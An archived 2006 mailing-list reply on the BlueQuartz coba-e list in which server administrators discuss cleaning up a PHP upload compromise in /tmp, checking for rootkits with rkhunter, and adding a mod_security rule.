Article 6876 at 06/09/13 18:11:11 From: paulw (at mark) swiftinter.net Subject: [coba-e:06876] Re: /TMP Directory

Index: [Article Count Order] [Thread]
Date:  Wed, 13 Sep 2006 09:52:16 +0100
From:  "Paul Wilson - Swift Internet" <paulw (at mark) swiftinter.net>
Subject:  [coba-e:06876] Re: /TMP Directory
To:  <coba-e (at mark) bluequartz.org>
Message-Id:  <003d01c6d714$02371580$0e00a8c0 (at mark) office.swiftinter.net>
References:  <002101c6d5ca$3c3c6960$6400a8c0 (at mark) YOUR4105E587B6> <006b01c6d655$d5dbbdb0$0e00a8c0 (at mark) office.swiftinter.net> <45071DAF.1070201 (at mark) planetcentral.net>
X-Mail-Count: 06876

The php?xxxxx query parameter has been exploited to upload the original hack 
file

The mod_security rules include a large number of blocks against this - but 
new flaws are being found

What did the access_log say? There should be a line telling you what page 
was used to upload the hack

Regards

Paul
________________________

Paul Wilson
Microsoft Certified Systems Engineer
paulw (at mark) swiftinter.net
http://www.swiftinter.net
Tel: 01527 500940
Fax: 01527 500934
________________________
Swift Internet is a trading division of On-Line Marketing & sales Ltd.
The information contained in this message is confidential and is
intended for the addressee(s) only.  If you have received this message
in error or there are any problems please notify the originator
immediately.  The unauthorised use, disclosure, copying or alteration of
this message is strictly forbidden. The sender will not be liable for 
direct,
special, indirect or consequential damages arising from alteration of
the contents of this message by a third party or as a result of any
virus being passed on.
----- Original Message ----- 
From: "paul" <paul (at mark) planetcentral.net>
To: <coba-e (at mark) bluequartz.org>
Sent: Tuesday, September 12, 2006 9:50 PM
Subject: [coba-e:06869] Re: /TMP Directory


> Paul,
>
> Have removed offending files and checked with rkh - all clear.
>
> Would be interested to hear what the score is with this mod_security 
> rule???
>
> Thx
> Paul
>
> Paul Wilson - Swift Internet wrote:
>> To be honest we did not find any damage apart from the initial lockup - 
>> the script prevents the restat of apache, so you have to foirce the 
>> apache proccesses to stop (always untidy)
>>
>> This thing seems to be used to flood networks with IRC data
>>
>> We installed rkhunter after removing the script and then ran it to ensure 
>> we had no lkms - all clear.
>>
>> Apart from that, I created a new mod_security rule based on that attack - 
>> we have had others try to get in the same way, only to be bounced off.
>>
>> Regards
>>
>> Paul
>
>
> -- 
> This message has been scanned for viruses and
> dangerous content by MailScanner, and is
> believed to be clean.
>
> 


-- 
This message has been scanned for viruses and
dangerous content by Swift Internet, and is
believed to be clean.